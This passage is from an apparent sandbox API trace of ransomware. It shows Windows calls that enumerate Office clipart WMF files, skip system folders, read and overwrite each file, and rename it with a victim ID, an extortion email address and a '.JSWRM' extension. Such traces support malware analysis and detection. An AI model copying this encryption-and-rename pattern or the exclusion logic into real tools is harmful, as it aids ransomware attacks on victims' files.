lpUsedDefaultChar=0x0) returned 5 [0085.718] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.718] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0085.718] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153516.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.719] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7432) returned 1 [0085.719] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.719] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1d00) returned 0x205850 [0085.719] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1d00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1d00, lpOverlapped=0x0) returned 1 [0085.734] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.734] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1d00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1d00, lpOverlapped=0x0) returned 1 [0085.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0085.734] CloseHandle (hObject=0x314) returned 1 [0085.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0085.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0085.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0085.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0085.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0085.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0085.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0085.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0085.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0085.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0085.734] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153516.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153516.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0085.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0085.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0085.735] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea7d707, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea7d707, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea7d707, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x30f0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0153518.WMF", cAlternateFileName="")) returned 1 [0085.735] lstrcmpiW (lpString1="J0153518.WMF", lpString2=".") returned 1 [0085.735] lstrcmpiW (lpString1="J0153518.WMF", lpString2="..") returned 1 [0085.735] lstrcmpiW (lpString1="J0153518.WMF", lpString2="...") returned 1 [0085.735] lstrcmpiW (lpString1="J0153518.WMF", lpString2="windows") returned -1 [0085.735] lstrcmpiW (lpString1="J0153518.WMF", lpString2="recovery") returned -1 [0085.735] lstrcmpiW (lpString1="J0153518.WMF", lpString2="perflogs") returned -1 [0085.735] lstrcmpiW (lpString1="J0153518.WMF", lpString2="documents and settings") returned 1 [0085.735] lstrcmpiW (lpString1="J0153518.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.735] lstrcmpiW (lpString1="J0153518.WMF", lpString2="system volume information") returned -1 [0085.735] lstrcmpiW (lpString1="J0153518.WMF", lpString2="msocache") returned -1 [0085.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0085.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153518.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153518.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153518.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0085.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0085.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153518.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0153518.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0153518.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0085.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0085.736] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0085.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0085.736] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153518.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153518.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.736] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12528) returned 1 [0085.736] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30f0) returned 0x24d210 [0085.736] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x30f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x30f0, lpOverlapped=0x0) returned 1 [0085.762] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.762] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x30f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x30f0, lpOverlapped=0x0) returned 1 [0085.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0085.762] CloseHandle (hObject=0x314) returned 1 [0085.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0085.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0085.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0085.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0085.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0085.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0085.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0085.762] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0085.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0085.762] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0085.762] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153518.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153518.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153518.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153518.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0085.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0085.763] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0085.763] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea7d707, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea7d707, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea7d707, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x560, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0156537.WMF", cAlternateFileName="")) returned 1 [0085.763] lstrcmpiW (lpString1="J0156537.WMF", lpString2=".") returned 1 [0085.763] lstrcmpiW (lpString1="J0156537.WMF", lpString2="..") returned 1 [0085.763] lstrcmpiW (lpString1="J0156537.WMF", lpString2="...") returned 1 [0085.763] lstrcmpiW (lpString1="J0156537.WMF", lpString2="windows") returned -1 [0085.763] lstrcmpiW (lpString1="J0156537.WMF", lpString2="recovery") returned -1 [0085.763] lstrcmpiW (lpString1="J0156537.WMF", lpString2="perflogs") returned -1 [0085.763] lstrcmpiW (lpString1="J0156537.WMF", lpString2="documents and settings") returned 1 [0085.763] lstrcmpiW (lpString1="J0156537.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.763] lstrcmpiW (lpString1="J0156537.WMF", lpString2="system volume information") returned -1 [0085.763] lstrcmpiW (lpString1="J0156537.WMF", lpString2="msocache") returned -1 [0085.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0085.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0156537.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0156537.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0156537.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0085.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0085.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0156537.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0156537.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0156537.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0085.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0085.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0085.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0085.764] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0156537.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0156537.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.765] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1376) returned 1 [0085.765] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x560) returned 0x2332c0 [0085.765] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x560, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x560, lpOverlapped=0x0) returned 1 [0085.766] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.766] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x560, lpOverlapped=0x0) returned 1 [0085.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0085.766] CloseHandle (hObject=0x314) returned 1 [0085.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0085.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0085.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0085.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0085.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0085.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0085.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0085.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0085.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0085.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0085.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0085.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0085.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0085.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0085.767] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0156537.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0156537.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0156537.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0156537.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0085.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0085.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0085.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0085.768] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea7d707, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xea7d707, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xea7d707, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb66e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0157167.WMF", cAlternateFileName="")) returned 1 [0085.768] lstrcmpiW (lpString1="J0157167.WMF", lpString2=".") returned 1 [0085.768] lstrcmpiW (lpString1="J0157167.WMF", lpString2="..") returned 1 [0085.768] lstrcmpiW (lpString1="J0157167.WMF", lpString2="...") returned 1 [0085.768] lstrcmpiW (lpString1="J0157167.WMF", lpString2="windows") returned -1 [0085.768] lstrcmpiW (lpString1="J0157167.WMF", lpString2="recovery") returned -1 [0085.768] lstrcmpiW (lpString1="J0157167.WMF", lpString2="perflogs") returned -1 [0085.768] lstrcmpiW (lpString1="J0157167.WMF", lpString2="documents and settings") returned 1 [0085.768] lstrcmpiW (lpString1="J0157167.WMF", lpString2="$RECYCLE.BIN") returned 1 [0085.768] lstrcmpiW (lpString1="J0157167.WMF", lpString2="system volume information") returned -1 [0085.768] lstrcmpiW (lpString1="J0157167.WMF", lpString2="msocache") returned -1 [0085.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0085.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0157167.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0157167.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0157167.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0085.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0085.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0157167.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0157167.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0157167.WMF", lpUsedDefaultChar=0x0) returned 12 [0085.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0085.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0085.768] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0085.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0085.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0085.768] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0085.768] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157167.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157167.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0085.769] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=46702) returned 1 [0085.769] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.769] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb660) returned 0x24d210 [0085.769] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xb660, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xb660, lpOverlapped=0x0) returned 1 [0085.779] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.779] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xb660, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xb660, lpOverlapped=0x0) returned 1 [0085.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0085.780] CloseHandle (hObject=0x314) returned 1 [0085.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0085.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 